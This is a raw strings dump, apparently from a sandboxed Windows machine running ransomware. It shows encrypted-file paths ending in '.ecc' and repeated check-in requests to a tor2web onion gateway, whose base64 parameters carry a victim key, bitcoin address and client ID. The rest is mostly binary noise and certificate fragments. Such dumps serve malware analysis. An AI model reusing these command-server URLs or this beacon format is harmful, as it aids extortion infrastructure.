LuX
Lu$
Mu`
LuX
Lu$
Mu0
LuX
Lu$
LuX
Lu$
LuX
Lu$
LuX
Lu$
Mu8
LuX
Lu$
Mu0
LuX
Lu$
LuX
Lu$
MuHXp
LuX
Lu$
Mu8&x
LuX
Lu$
LuX
Lu$
LuX
Lu$
LuX
Lu$
Mu(
LuX
Lu$
Mu0
LuX
Lu$
LuX
Lu$
Muhxt
LuX
Lu$
Mu(
LuX
Lu$
LuX
Lu$
LuX
Lu$
Mu8Lq
LuX
Lu$
LuX
Lu$
LuX
Lu$
Mu8
LuX
Lu$
LuX
Lu$
LuX
Lu$
LuX
Lu$
LuX
Lu$
LuX
Lu$
Mu0;r
LuX
Lu$
Muh&x
LuX
Lu$
Mu`zt
LuX
Lu$
LuX
Lu$
LuX
Lu$
LuX
Lu$
Mux
LuX
Lu$
LuX
Lu$
Mu@
LuX
Lu$
LuX
Lu$
LuX
Lu$
LuX
Lu$
LuX
Lu$
LuX
Lu$
Mup
LuX
Lu$
LuX
Lu$
LuX
Lu$
LuX
Lu$
LuX
Lu$
LuX
Lu$
LuX
Lu$
LuX
Lu$
LuX
Asyc
x@p
@5x
x@p
qqqqqqqqqqqqqqqq
,6x
<6x
x@p
`Ap
xWp
q(8x
@8x
X8x
qp8x
xGn
zCn
{Cn
8Gz
8Gz
https
zCn
{Cn6
https
(Cn
X[q
https
 :x
8:x
P:x
h:x
APIO
https
(;x
@;x
1910X;x
00Z
HRr
P<x
gro.
ARSM
H<x
HRr
h<x
keysvc
ARSM
 =x
`>x
ncalrpc
@=x
P=x
h=x
ncalrpc
@>x
0?x
IFu
ncalrpc
8?x
ncalrpc
 ?x
 ?x
X>x
IFu
ncalrpc
ncalrpc
x9x
HFu
(Yr
r<F;8?W<|
vx@p
HjO
hjD
ASYC
0Bx
vx@p
HjO
hjD
@Au
ASYC
8Dx
vx@p
HjO
hjD
ASYC
hPx
l4q
vx@p
HjO
hjD
ASYC
xTx
|<q
vx@p
HjO
hjD
ASYC
vx@p
HjO
hjD
ASYC
<F;8?W<|
r<F;8?W<|
ASYC
vx@p
HjO
hjD
ASYC
vx@p
HjO
hjD
xAu
ASYC
<F;8?W<|
r<F;8?W<|
vx@p
HjO
hjD
ASYC
vx@p
HjO
hjD
ASYC
vx@p
HjO
hjD
ASYC
vx@p
HjO
hjD
ASYC
vx@p
HjO
hjD
ASYC
r<F;8?W<|
`(+w
XOq
x@p
`Ap
xWp
+wd
`(+w
`Wz
 8u
TcmT1M9OTIwMCZJRD0xNiZzdWJpZD0wJmdhdGU9RzE=
0[1
BE1
GlobalSign nv-sa110/
(GlobalSign OCSP for Root R1 - Signer 1.1
190711163355Z
190715163355Z
20190711163355Z0r0p0D0
`{f
P/}
20190711163355Z
20190715163355Z
CC!
%A{j!
<{;L
0W1
BE1
GlobalSign nv-sa1
Root CA1
GlobalSign Root CA0
190707000000Z
191015000000Z0[1
BE1
GlobalSign nv-sa110/
(GlobalSign OCSP for Root R1 - Signer 1.10
D~y
\Q10
P8fQi
-1.*
r:Ns
h7Z
Jmc
`{f
P/}
E0C0A
_0402
&https://www.globalsign.com/repository/0
'}a&
/v-]
JyH~B
\_w
@"I
~+/
/,-
AJD
a1^q
O20
[_n
('x
x@p
`Ap
xez
(uX
(u
pQv
01Q\
y~D
w CKM
\??\C:\Program Files\Git\usr\share\licenses\*.*
https://7tno4hib47vlep5o.tor2web.blutmagie.de/
http://crl2.alphassl.com/gs/gsalphasha2g2.crl
\??\C:\Program Files\Common Files\System\*.*
\??\C:\Program Files\nodejs\node_modules\*.*
\??\C:\Program Files\Git\usr\share\icons\*.*
https://7tno4hib47vlep5o.tor2web.blutmagie.de/
\??\C:\Program Files\Git\usr\ssl\cert.pem.ecc
w CKM
\??\C:\Program Files\Git\usr\share\makepkg\*.*
\??\C:\Program Files\Git\usr\share\tabset\*.*
\??\C:\Program Files\Git\mingw64\ssl\cert.pem
\??\C:\Program Files\Git\usr\share\cygwin\*.*
\??\C:\Program Files\Git\mingw64\lib\tcl8\*.*
\??\C:\Program Files\Git\mingw64\share\git\*.*
\??\C:\Program Files\Git\usr\share\mintty\*.*
\??\C:\Program Files\Git\usr\share\terminfo\*.*
\??\C:\Program Files\Git\usr\share\perl5\*.*
\??\C:\Program Files\Git\usr\lib\p11-kit\*.*
\??\C:\Program Files\Git\mingw64\lib\reg1.3\*.*
\??\C:\Program Files\Git\mingw64\share\doc\*.*
http://crl2.alphassl.com/gs/gsalphasha2g2.crl
7795-2945462786-
\??\C:\Program Files\Git\mingw64\ssl\cert.pem
https://7tno4hib47vlep5o.tor2web.blutmagie.de/
if.bew2rot.o5pelv74bih4ont7
7tno4hib47vlep5o.tor2web.fi
x@p
\??\C:\Program Files\Git\usr\share\p11-kit\*.*
\??\C:\Program Files\Git\usr\lib\terminfo\*.*
WHRB
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Expires: Mon, 15 Jul 2019 16:33:55 GMT
X-Powered-By: Undertow/1
ETag: "c27ac029db3d07f67cd0d5e6d834eb3579bb3630"
Last-Modified: Thu, 11 Jul 2019 16:33:55 GMT
Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
Via: 1.1 varnish
Content-Length: 1526
Accept-Ranges: bytes
Date: Thu, 11 Jul 2019 17:15:10 GMT
Via: 1.1 varnish
Age: 794
Connection: keep-alive
X-Served-By: cache-sin18039-SIN, cache-lga21932-LGA
X-Cache: HIT, HIT
X-Cache-Hits: 1, 83
X-Timer: S1562865311.623099,VS0,VE0
20190711163355Z0r0p0D0
`{f
P/}
20190711163355Z
20190715163355Z
CC!
%A{j!
<{;L
0W1
BE1
GlobalSign nv-sa1
Root CA1
GlobalSign Root CA0
190707000000Z
191015000000Z0[1
BE1
GlobalSign nv-sa110/
(GlobalSign OCSP for Root R1 - Signer 1.10
D~y
\Q10
m8m8m
sticky
 domain
knil.noino
disclaimer_accepted
= 1
disclaimer_accepted
= 1
DisallowedCert_AutoUpdate_1
190315210023Z0
/^g(
o-Ce
vs0
Jy~Z
1n8J0
79.
{8$G9
KW&
hF0
Rj9
(|X7
wX~
jW0
{7!
o{m
!{z
rYad0
"A^
gNj
QJg0
[J730
{?1
X0D
GZ;~
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\node_modules\resolve\test\resolver\multirepo\packages\package-b\package.json
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\node_modules\resolve\test\resolver\multirepo\packages\package-b\package.json
ate Trust List PCA0
190405001711Z
200405001711Z0
US1
Washington1
Redmond1
Microsoft Corporation1301
*Microsoft Certificate Trust List Publisher0
J'I
Ue<
7Iq
\;H
(/e
}>6
1a%
xO<
(Nl?,
eLA?
Op2AIg
%:;
gr4
>0<
:081
Microsoft Corporation1
229943+4539820
a0_0]
Whttp://www.microsoft.com/pkiops/crl/Microsoft%20Certificate%20Trust%20List%20PCA(3).crl0u
i0g0e
Yhttp://www.microsoft.com/pkiops/certs/Microsoft%20Certificate%20Trust%20List%20PCA(3).crt0
/1 v
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\node_modules\resolve\test\resolver\multirepo\packages\package-a\package.json
44489
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\node_modules\resolve\test\resolver\multirepo\packages\package-a\package.json
I%@
SubC
`@V'
I0G0E
?http://g
)Z8a
Q,|q
/&-
ECi
xWz
zT|
`:{
tsZi
1F|
?L]
s`S
}Wf
$X+
lKck
Lwm,B[
$Ns
*[\v
Z]z
j;S#
jO:
E0C0A
_0402
&https://www.globalsign.com/repository/0
?Sy
4#M
r,Z
2x:
vB[
Kqw
lqf~/l
A256 - G2 - OCSP Responder0
^`I s
Bluetooth Device (Personal Area Network)
{C47C3B00-8719-4434-B061-4F705DAB5879}
nonic
Loopback Pseudo-Interface 1
Software Loopback Interface 1
{97E36F80-A1D2-11E9-873B-806E6F6E6963}
nonic
Teredo Tunneling Pseudo-Interface
Teredo Tunneling Pseudo-Interface
{03CB9966-4487-4FAF-B2BE-390AF65E1525}
3lss
Jd\
RUUU
KSSM
j_Ul
I&D
z<f
Y#2
Fbd
F1Z
RD4
]%y
na/k
ztw
54}
s,g
i;AX
_NcI
_NcI
o~5
>%x
sG4
M%k[hr
sG4
M%k[9
l{0
dI*
i-3um
!wk
j_Ul
I&D
z<f
Y#2
Fbd
F1Z
RD4
]%y
na/k
3lss
RUUU
KSSM
%6$
%6$
T8A
=hD
kTW
8kzE
zFg
m{B
3b*P
a6@ch
mrm
[y%e
X7y
Nan
|7l
%6$
Bt9X
`PhA
`P;
]IN
Mo#
'7tk
6gU
'93
hBL
,"oJ
)_d!8c
V6*(
Fn]
fi)
Yhk
$&-~
$&-~
!w%6$
T8A
=hD
kTW
8kzE
zFg
m{B
3b*P
a6@ch
mrm
[y%e
X7y
Nan
|7l
%6$
%6$
HReq
AAAA
HCon
8{t
Head
H9x
Head
Paz
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\read-installed\test\fixtures\grandparent-peer-dev\package.json.ecc
ASYC
07z
07z
@7z
P7z
`7z
p7z
 8z
08z
@8z
P8z
`8z
p8z
 9z
 09z
!@9z
"P9z
#`9z
$p9z
/ :z
00:z
1@:z
2P:z
3`:z
4p:z
? ;z
@0;z
A@;z
BP;z
C`;z
Dp;z
O <z
P0<z
Q@<z
RP<z
S`<z
Tp<z
_ =z
`0=z
a@=z
bP=z
c`=z
dp=z
o >z
p0>z
q@>z
rP>z
s`>z
tp>z
 ?z
0?z
@?z
P?z
`?z
p?z
 @z
0@z
@@z
P@z
`@z
p@z
 Az
0Az
@Az
PAz
`Az
pAz
 Bz
0Bz
@Bz
PBz
`Bz
pBz
 Cz
0Cz
@Cz
PCz
`Cz
pCz
 Dz
0Dz
@Dz
PDz
`Dz
pDz
 Ez
0Ez
@Ez
PEz
`Ez
pEz
 Fz
0Fz
@Fz
PFz
`Fz
pFz
GET /state.php?U3ViamVjdD1QaW5nJmtleT0zQkY4RTIzMjQ0QzExMzQ5MjI0MDYxMkY3MkYwQTZDRTc1Mzg4ODdBN0JFNEQwOTQwRUI4OTBENTE2N0Y5MDk2JmFkZHI9MU02NThSd2JmN1BOd0ZNTGdDUkFtdTJZZWRSTTZCTktKWSZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE1NjI4NjUzMTcmT1M9OTIwMCZJRD0xNiZzdWJpZD0wJmdhdGU9RzE= HTTP/1.1
,'p
,'p
User-AgentMozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
hHz
IIz
MIz
Host7tno4hib47vlep5o.tor2web.blutmagie.deGET /state.php?U3ViamVjdD1QaW5nJmtleT0zQkY4RTIzMjQ0QzExMzQ5MjI0MDYxMkY3MkYwQTZDRTc1Mzg4ODdBN0JFNEQwOTQwRUI4OTBENTE2N0Y5MDk2JmFkZHI9MU02NThSd2JmN1BOd0ZNTGdDUkFtdTJZZWRSTTZCTktKWSZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE1NjI4NjUzMTcmT1M9OTIwMCZJRD0xNiZzdWJpZD0wJmdhdGU9RzE= HTTP/1.1
ConnectionKeep-Alive
T'p
T'p
Cookiedisclaimer_accepted=1
https://7tno4hib47vlep5o.tor2web.blutmagie.de/state.php?U3ViamVjdD1QaW5nJmtleT0zQkY4RTIzMjQ0QzExMzQ5MjI0MDYxMkY3MkYwQTZDRTc1Mzg4ODdBN0JFNEQwOTQwRUI4OTBENTE2N0Y5MDk2JmFkZHI9MU02NThSd2JmN1BOd0ZNTGdDUkFtdTJZZWRSTTZCTktKWSZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE1NjI4NjUzMTcmT1M9OTIwMCZJRD0xNiZzdWJpZD0wJmdhdGU9RzE=
?U3ViamVjdD1QaW5nJmtleT0zQkY4RTIzMjQ0QzExMzQ5MjI0MDYxMkY3MkYwQTZDRTc1Mzg4ODdBN0JFNEQwOTQwRUI4OTBENTE2N0Y5MDk2JmFkZHI9MU02NThSd2JmN1BOd0ZNTGdDUkFtdTJZZWRSTTZCTktKWSZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE1NjI4NjUzMTcmT1M9OTIwMCZJRD0xNiZzdWJpZD0wJmdhdGU9RzE=
https://7tno4hib47vlep5o.tor2web.blutmagie.de/state.php?U3ViamVjdD1QaW5nJmtleT0zQkY4RTIzMjQ0QzExMzQ5MjI0MDYxMkY3MkYwQTZDRTc1Mzg4ODdBN0JFNEQwOTQwRUI4OTBENTE2N0Y5MDk2JmFkZHI9MU02NThSd2JmN1BOd0ZNTGdDUkFtdTJZZWRSTTZCTktKWSZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE1NjI4NjUzMTcmT1M9OTIwMCZJRD0xNiZzdWJpZD0wJmdhdGU9RzE=
HCon
AAAA
HCon
($v
 [v
V[v
CONN
CONL
@Yz
TCPC
@Yz
0SGn
@Yz
0SGn
x r
HCON
Bn@
Cn qCn
~rz
WHRB
~rz
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Expires: Mon, 15 Jul 2019 15:10:07 GMT
X-Powered-By: Undertow/1
ETag: "38e2dfab09f70eda0bad477362179b953a2ac451"
Last-Modified: Thu, 11 Jul 2019 15:10:07 GMT
Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
Via: 1.1 varnish
Content-Length: 1521
Accept-Ranges: bytes
Date: Thu, 11 Jul 2019 17:15:11 GMT
Via: 1.1 varnish
Age: 236
Connection: keep-alive
X-Served-By: cache-sin18031-SIN, cache-lga21926-LGA
X-Cache: HIT, HIT
X-Cache-Hits: 7, 1
X-Timer: S1562865311.961795,VS0,VE224
20190711151007Z0s0q0E0
kga
jO:
h:B
20190711151007Z
20190715151007Z
}[HD
LrF
W;6
1Bof
T8z@
~Rg
D:.
0L1
BE1
GlobalSign nv-sa1"0
AlphaSSL CA - SHA256 - G20
190709070144Z
191009070144Z0t1
BE1
GlobalSign nv-sa1
2019042400041301
*AlphaSSL CA - SHA256 - G2 - OCSP Responder0
^`I s
nonic
nonic
<uz
Tuz
puz
prod.globalsign.map.fastly.net
ocsp2.globalsign.com
r}z
6}z
nonic
nonic
DOCUME~1
Documents and Settings
}T6
}T6
pagefile.sys
WS=
PerfLogs
PROGRA~1
Program Files
PROGRA~2
Program Files (x86)
PROGRA~3
ProgramData
D=7
Python27
Recovery
}T6
}T6
swapfile.sys
SYSTEM~1
System Volume Informationh
IHl
Users
IHl
Windows
E1NjI4NjUzMTcmT1M9OTIwMCZJRD0xNiZzdWJpZD0wJmdhdGU9RzI=
($v
7tno4h
47vlep5o.tor2w
eT0zQkY4
N0JFNEQwOTQwRUI4OTBENTE2
d0ZN
ZWRS
9uPTAuMi42YS
pI4NjUzMTcmT1M9OTIwMCZJRD0xNiZzdWJpZD0wJmdhdGU9RzI=
https://7tno4hib47vlep5o.tor2web.fi/state.php?U3ViamVjdD1QaW5nJmtleT0zQkY4RTIzMjQ0QzExMzQ5MjI0MDYxMkY3MkYwQTZDRTc1Mzg4ODdBN0JFNEQwOTQwRUI4OTBENTE2N0Y5MDk2JmFkZHI9MU02NThSd2JmN1BOd0ZNTGdDUkFtdTJZZWRSTTZCTktKWSZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE1NjI4NjUzMTcmT1M9OTIwMCZJRD0xNiZzdWJpZD0wJmdhdGU9RzI=
?U3ViamVjdD1QaW5nJmtleT0zQkY4RTIzMjQ0QzExMzQ5MjI0MDYxMkY3MkYwQTZDRTc1Mzg4ODdBN0JFNEQwOTQwRUI4OTBENTE2N0Y5MDk2JmFkZHI9MU02NThSd2JmN1BOd0ZNTGdDUkFtdTJZZWRSTTZCTktKWSZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE1NjI4NjUzMTcmT1M9OTIwMCZJRD0xNiZzdWJpZD0wJmdhdGU9RzI=
https://7tno4hib47vlep5o.tor2web.fi/state.php?U3ViamVjdD1QaW5nJmtleT0zQkY4RTIzMjQ0QzExMzQ5MjI0MDYxMkY3MkYwQTZDRTc1Mzg4ODdBN0JFNEQwOTQwRUI4OTBENTE2N0Y5MDk2JmFkZHI9MU02NThSd2JmN1BOd0ZNTGdDUkFtdTJZZWRSTTZCTktKWSZmaWxlcz0wJnNpemU9MCZ2ZXJzaW9uPTAuMi42YSZkYXRlPTE1NjI4NjUzMTcmT1M9OTIwMCZJRD0xNiZzdWJpZD0wJmdhdGU9RzI=
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\read-installed\test\fixtures\grandparent-peer\*.*
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\promise-retry\node_modules\retry\example\stop.js
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\rc\node_modules\minimist\package.json.eccs
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\retry\test\integration\test-retry-operation.js
ADM
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\readdir-scoped-modules\test\fixtures\@org\y\*.*
test.js
testsp
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\readdir-scoped-modules\test\fixtures\@scope\y\*.*
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\readable-stream\lib\internal\streams\stream.js
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\rc\node_modules\minimist\test\parse_modified.js
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\readable-stream\lib\internal\streams\pipeline.js
-~1.JS
parse-arg.js
profile.js
READ-J~1.JS
json.jsip
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\readdir-scoped-modules\test\fixtures\@scope\*.*
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\readdir-scoped-modules\test\fixtures\@scope\x\*.*
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\run-queue\node_modules\aproba\package.json.ecc
VERIFY~1.JS
ck.jsogram Files\nodejs\node
age\*.*
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\readable-stream\lib\internal\streams\destroy.js
..p.n
D=7
npmtall.insmui
ieinstal.exe.mui
iexplore.exe.mui
CT_LOG~1.DISct_log_list.cnf.distoh
miscAx
openssl.cnfNA
OPENSS~1.DISopenssl.cnf.distsh.nanorcx
SPEC~1.NAN
spec.nanorcrcx
TCL~1.NAN
tcl.nanorcnorx
TEX~1.NAN
tex.nanorcnan
TEXINF~1.NANtexinfo.nanorcnor
XML~1.NAN
xml.nanorc.nanorcx
GIT~1.NAN
git.nanorc
GOCAAD~1.NANgo.nanorcx
GROFF~1.NAN
groff.nanorc
GUILE~1.NAN
guile.nanorc
HTML~1.NAN
html.nanorc
JAVA~1.NAN
java.nanorc
JAVASC~1.NANjavascript.nanorcx
JSON~1.NAN
json.nanorc
LUA~1.NAN
lua.nanorc
MAKEFI~1.NANmakefile.nanorc
MAN~1.NAN
man.nanorc
MGP~1.NAN
mgp.nanorc
MUTT~1.NAN
mutt.nanorc
NANOHE~1.NANnanohelp.nanorc
NANORC~1.NANnanorc.nanorc
NFTABL~1.NANnftables.nanorc
OBJC~1.NAN
objc.nanorc
OCAML~1.NAN
ocaml.nanorc
PATCH~1.NAN
patch.nanorc
PERL~1.NAN
perl.nanorc
D=7
..erm
LICENS~1.JSO.licensee.json
MAILMA~1
.mailmap
NPMIGN~1
.npmignore
TRAVIS~1.YML.travis.yml
appveyor.yml
AUTHORS
bin
CHANGE~1.MD
CHANGELOG.md
CHANGE~1
changelogs
CONFIG~1
configure
CONTRI~1.MD
CONTRIBUTING.md
doc
html
n'G
n'G
n'G
libexp
LICENSE
make.bat
Makefile
2x]
man
NODE_M~1
node_modules
npmrcx
PACKAG~1.JSOpackage.json
README.mdp
scripts
test
packsp
g/V
g/V
g/V
pluginr6fh
g/V
printp
~mNV
rgb.txtrmx
~mNV
~mNV
~mNV
scripts.vimtfh
spellx
'rV
synmenu.vim
'rV
syntax~1
toolsh
tutor
VIMRC_~1.VIMvimrc_example.vim
XT6B87~1
xterm-xf86-v32
NEXT.pm
requestis
REQUIR~2
require-directory
REQUIR~1
require-main-filenamex
RESOLV~1
resolve-from
retryp
rimrafrfop
RUN-QU~1
run-queuex
SAFE-B~1
safe-bufferpex
SAFER-~1
safer-bufferep
semverOMIx
SEMVER~1
semver-diff
SET-BL~1
set-blocking
sha
SHEBAN~2
shebang-command
SHEBAN~1
shebang-regexx
SIGNAL~1
signal-exit
slashh
slidex
SMART-~1
smart-bufferih
socks
SOCKS-~1
socks-proxy-agentx
SORTED~2
sorted-object
SORTED~1
sorted-union-stream
ey*
SPDX-C~1
spdx-correct
SPDX-E~2
spdx-exceptions
SPDX-E~1
spdx-expression-parse
n'G
n'G
n'G
SPDX-L~1
spdx-license-idsrh
sshpkh
ssri
STREAM~2
stream-each
>aJ
>aJ
>aJ
STREAM~1
stream-iterate
STREAM~3
stream-shift
STRICT~1
strict-uri-encode
STRING~2
string-widthparallel-transformtreamm.vim
m8m8m
p,P
`,P
d5s
by6s
Y\MACHINE\
STEM\ControlSe
\Param
log5
`,P
`,P
p,P
M2s
f2s
cm2s
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\
BnS
\Parameters\NameSpace_Catalog5\00000016
<&0w#
hd5s
90w#
ules\npm\node_modules\JSONStream\test\doubledot1.js
\Device\HarddiskVolume4\Program Files\Git\usr\bin\bash.exe
oker.exe
\OneDrive.exe
000_x64__kzf8qxf38zg5c\SkypeHost.exe
vT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
NIB
oT6
DCB
oT6
oT6
oT6
oT6
oT6
GuB
Obr
pT6
pT6
qT6
gFB
qT6
&uC
sT6
sT6
sT6
sT6
joC
sT6
sT6
sT6
f>%sT6
\Device\HarddiskVolume4\Program Files\WindowsApps\Microsoft.SkypeApp_12.1815.210.1000_x64__kzf8qxf38zg5c\SkypeHost.exe
\Device\HarddiskVolume4\Windows\System32\conhost.exe
.exe
vmtoolsd.exe
5n1h2txyewy\SearchUI.exe
.exe
\Device\HarddiskVolume4\Program Files\Git\git-bash.exe
y.exe
er-2.39-bin\x64\ProcessHacker.exe
.exe
g5c\SkypeHost.exe
\Device\HarddiskVolume4\Program Files\Windows Defender\MSASCuiL.exe
-bin\x64\ProcessHacker.exe
.exe
\Device\HarddiskVolume4\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
.exe
g5c\SkypeHost.exe
\Device\HarddiskVolume4\Users\Dummy\Desktop\sysinterals\Procdump\procdump.exe
exe
\SearchUI.exe
.exe
\Device\HarddiskVolume4\Program Files\Git\usr\bin\bash.exe
.SkypeApp_12.1815.210.1000_x64__kzf8qxf38zg5c\SkypeHost.exe
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\node_modules\resolve\test\resolver\baz\package.json.ecc
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\parallel-transform\node_modules\readable-stream\lib\internal\streams\BufferList.js
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\node_modules\resolve\test\resolver\multirepo\lerna.json.ecc
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\node_modules\resolve\test\resolver\invalid_main\package.json
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\fs-write-stream-atomic\node_modules\readable-stream\lib\internal\streams\destroy.js
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\node_modules\resolve\test\resolver\dot_slash_main\package.json
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\node_modules\resolve\test\resolver\other_path\lib\other-lib.js
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\node_modules\resolve\test\resolver\multirepo\package.json.ecc
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\node_modules\resolve\test\resolver\dot_main\package.json.ecc
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\flush-write-stream\node_modules\readable-stream\lib\internal\streams\BufferList.js
\??\C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\node_modules\resolve\test\resolver\invalid_main\package.json
INDEXD~1.TS
index.d.tser.p
index.js-p
LICENSE
PACKAG~1.JSOpackage.json
README.mdE.mdalled.jsp
README.md
test
NODE_M~1
node_modules
PACKAG~1.JSOpackage.json
README.md
test
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
NIB
oT6
DCB
oT6
oT6
oT6
oT6
oT6
GuB
Obr
pT6
pT6
qT6
gFB
qT6
&uC
sT6
sT6
sT6
sT6
joC
sT6
sT6
sT6
f>%sT6
NPMIGN~1
.npmignore
TRAVIS~1.YML.travis.ymljsp
index.jspx
LICENSE.txt3.x
PACKAG~1.JSOpackage.json_p
README.md
test.jsRAN~2.JS
extraneous-dev.jsx
EXTRAN~1.JS
extraneous.jsp
fixtures
GRANDP~1.JS
grandparent-peer-dev.js&
GRANDP~2.JS
grandparent-peer.js
issue-40.js
LINKED~1.JS
linked-dep-dev-deps-extraneous.jsp
noargs.js
PEER-D~1.JS
peer-dep-at-latest.jsble.js
aprobajsep
LICENSEpex
PACKAG~1.JSOpackage.json
README.md
rimraf.js
pipeline.js
state.js
STREAM~1.JS
stream-browser.js
stream.js
MUG~1.COF
mug.coffee
mug.jsOCEp
MULTIR~1
multirepox
OTHER_~1
other_path
quux
SAME_N~1
same_names
SYMLIN~1
symlinked
WITHOU~1
without_basedir
common.js
u"X
u"X
u"X
INTEGR~1
integrations
lib.jp
LICENSEdmx
PACKAG~1.JSOpackage.jsonjp
README.md
request.jsry-url.js
testj
YARN~1.LOC
yarn.lock.jsl
PARSE_~1.JS
parse_modified.jsp
short.js
STOP_E~1.JS
stop_early.jsx
unknown.js
WHITES~1.JS
whitespace.js
NPMIGN~1
.npmignore
TRAVIS~1.YML.travis.ymlbrp
index.jsep
LICENSE
PACKAG~1.JSOpackage.jsonG
README~1.MARREADME.markdown
lib
LICENSE
PACKAG~1.JSOpackage.json
READAB~1.JS
readable-browser.js
readable.js
{GV
{GV
README.md
YARN~1.LOC
yarn.lock
2[?
2[?
MSVSSE~2.PY
MSVSSettings_test.py
MSVSTO~1.PY
MSVSToolFile.py
;mU
;mU
MSVSUS~1.PY
MSVSUserFile.py
MSVSUtil.py
MSVSVE~1.PY
MSVSVersion.py
MSVS_E~1.PY
msvs_emulation.py
NINJA_~1.PY
ninja_syntax.py
ORDERE~1.PY
ordered_dict.py
SIMPLE~1.PY
simple_copy.py
win_tool.py
XCODEP~1.PY
xcodeproj_file.py
XCODE_~1.PY
xcode_emulation.py
XCODE_~2.PY
xcode_ninja.py
!4U
!4U
xml_fix.py
__init__.py
DANGER~1.JS
dangerous.js
LICENSEngx
PACKAG~1.JSOpackage.json
PORTIN~1.MD
Porting-Buffer.mdp
Readme.mdp
safer.js
tests.js
README.md
testME.md
test
header.js
9'0
9'0
PACK-N~1.JS
pack-no-proprietary.js
w>h
w>h
pack.js
PARSE-~1.JS
parse-discard.js
parse.js
ZZ-CLE~1.JS
zz-cleanup.js
index.jsep
LICENSE.jx
PACKAG~1.JSOpackage.jsonF
README.md
har.js
hawk.js
helpers.js
MULTIP~1.JS
multipart.js
oauth.js.
QUERYS~1.JS
querystring.js~1.x
redirect.js
tunnel.js
NODE_M~1
node_modules
PACKAG~1.JSOpackage.json
queue.js.
README.mdle
index.jsth
libDMp
Licenset
Makefile
PACKAG~1.JSOpackage.json
$xZ
$xZ
Readme.md
testNODE-M~1.JS
node-modules-paths.jsp
NODE_P~1
node_pathx
6`l
6`l
NODE_P~1.JS
node_path.jstx
NONSTR~1.JS
nonstring.js.x
PATHFI~1
pathfilter
PATHFI~1.JS
pathfilter.jsx
_nR
_nR
PRECED~1
precedence
PRECED~1.JS
precedence.jsp
resolver
resolver.js
RESOLV~1.JS
resolver_sync.js
subdirs.js
symlinks.js
EXTRAN~1
extraneous-detected
EXTRAN~2
extraneous-dev-dep
GRANDP~1
grandparent-peer
GRANDP~2
grandparent-peer-dev
PACKAG~1.JSOpackage.json
perm.js
PERM_S~1.JS
perm_sync.js
race.js
rel.js
return.js
RETURN~1.JS
return_sync.js
root.js
sync.js
umask.js
UMASK_~1.JS
umask_sync.js
PACKAG~1.JSOpackage.json
NODE_M~1
node_modules
SYMLIN~1
symlink_target
index.js
PACKAG~1.JSOpackage.json
DST
vT6
b'?
z-=
vT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
oT6
NIB
oT6
DCB
oT6
oT6
oT6
oT6
oT6
GuB
Obr
pT6
pT6
qT6
gFB
qT6
&uC
sT6
sT6
sT6
sT6
joC
sT6
sT6
sT6
f>%sT6
p;P
p;P
z;P
p;P
p;P
F1s
p,P
p;P
c3s
p;P
@:P
=2s
p;P
p;P
F1s
p;P
F1s
Tn2s
/2s
 1s
0w#
hd5s
 0w#
ho5s
o5s
\BaseNamedObjects\Global\DESKTOP-AERI7HN
 w6s
\??\C:\Windows\system32
`y6s
`y6s
\Device\HarddiskVolume4\Windows
{6s
3++S++
3++S++
@.w
t0w4
~-wL
 3.w
8y-w(
y-w
